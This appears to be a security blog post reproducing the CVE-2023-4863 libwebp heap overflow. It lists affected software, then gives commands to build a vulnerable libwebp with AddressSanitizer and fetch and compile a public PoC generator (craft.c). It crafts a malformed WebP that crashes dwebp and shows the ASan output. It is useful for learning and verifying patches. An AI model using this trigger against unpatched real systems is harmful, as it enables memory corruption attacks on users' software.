Use what I’m about to say in this article only for the right purposes, such as raising security awareness and improving the security posture of your environments. I do not accept any responsibility for other uses.
WebP is an open-source image format developed by Google. WebP enables higher quality images in smaller file sizes. The libwebp package, released by Google, encodes and decodes images in WebP format and is used widely across the internet for lossless image compression.
The image parsing library libwebp is the core of the recently identified CVE-2023-4863 heap buffer overflow vulnerability and zero-day exploit that impacts Google Chrome and other Chromium-based browsers for Windows, macOS, and Linux, as well as any software or web application that uses the libwebp library. (Source:https://www.upguard.com/blog/libwebp-cve-2023)
In Google Chrome, versions before 116.0.5845.187 and libwebp 1.3.2 are affected by these vulnerabilities. Chromium security severity is Critical.
Since many applications use the webp library, many applications are affected by this vulnerability and the CVSS score is 8.8. Here are some apps that may be affected.
| Category | Products |
| Web Browsers | Google Chrome, Safari, Microsoft Edge, Mozilla Firefox, Tor, Beaker (web browser), GNOME Web, Midori, OhHai Browser, Pale Moon, SEOBrowse |
| Social Media | Discord, Facebook, Instagram, Linked, Pinterest, Reddit, Telegram, Twitter, WhatsApp, |
| Video Platforms | Lbry, Twitch, Vimeo, YouTube, YTMDesktop App |
| Cloud Storage | Amazon Photos, Dropbox, Google Drive, Google Photos |
| Ecommerce | Amazon, Ebay, Etsy, Shopify, WooCommerce |
| CMS | Drupal, Joomla, MediaWiki, WordPress |
| Email Services | Gmail |
| Forum Software | PHPBB, vBulletin, XenForo |
| Photo Editing | GDAL, GIMP, Graphic Converter, ImageMagick, Paint.NET, Photoshop, Photoshop and Picasa, Pixelmator, XnView |
| Game Engines | Godot Engine, Unreal Engine, Unity |
| Desktop Software | 1Password, Basecamp 3, Bitwarden, Blender, Cryptocat (discontinued), Discord, Discord RPC Maker, Electron App Store (Unofficial), Etcher, |
| Web Servers | Apache, IIS, nginx |
| Major Companies | Facebook, Google, Slack, Wikimedia, WordPress.com |
(List source: https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html)
So let’s perform the POC of this vulnerability.
Let’s download the libwebp library from Google source.
git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
Let’s go to the webp_test folder.
cd webp_testThen, let’s move on to the relevant commit.
git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
Let’s enable AddressSanitizer (ASan). This tool helps detect address corruption errors in C and C++ programs.
sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unixLet’s compile the makefile.unix file.
make -f makefile.unixAt this point you may encounter errors that some files are missing. I will show what I encountered in words and share the commands that will solve it.
Let’s install libjpeg-dev.
sudo apt-get install libjpeg-devThen install libpng-dev
sudo apt-get install libpng-devInstall the libtiff-dev.
sudo apt-get install libtiff-devThen, compile the makefile.unix file again.
make -f makefile.unix
Then, go to the examples folder.
cd examples/Let’s download the C source code named craft.c.
wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
Let’s compile the C source code named craft.c. As a result of the compiled code, it will give us an output file named craft.
gcc -o craft craft.cLet’s give the bad.webp image as input to the craft file.
./craft bad.webpThen let’s run our last command.
./dwebp bad.webp -o test.pngHeap buffer overflow occurs exactly at this stage.
The output shows us that the dwebp program encountered a heap buffer overflow. This means that the program is trying to write data to a memory location that it is not allowed to access. Our AddressSanitizer (ASan) debugger tool worked as we expected and informed us that heap buffer overflow had occurred. The error occurs in the BuildHuffmanTable function, which is part of the WebP library.
As we see in the error description, it occurs in the memory area at 0x626000002f28.
==78508==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x5589e8fad35a bp 0x7fff95d4c400 sp 0x7fff95d4c3f0
In the section below, we see the function that triggered the error. That is, the BuildHuffmanTable function.
#0 0x5589e8fad359 in BuildHuffmanTable (/home/ali/webp_test/examples/dwebp+0xb6359)
AddressSanitizer uses Shadow Bytes when doing this debugging. Shadow Bytes can basically be thought of as a copy of the real memory, and when an error occurs, AddressSanitizer works on shadow bytes and carries information about the values of the relevant address blocks in memory at the time the error occurred.
Shadow bytes around the buggy address:
0x0c4c7fff8590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c7fff85a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c7fff85b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c7fff85c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c7fff85d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4c7fff85e0: 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa
0x0c4c7fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c7fff8600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c7fff8610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c7fff8620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c7fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Sources
->https://github.com/bbaranoff/CVE-2023-4863
->https://github.com/mistymntncop/CVE-2023-4863/blob/main/bad.webp
->https://www.upguard.com/blog/libwebp-cve-2023
->https://www.cyberkendra.com/2023/09/webp-0day-google-assign-new-cve-for.html
Leave a Reply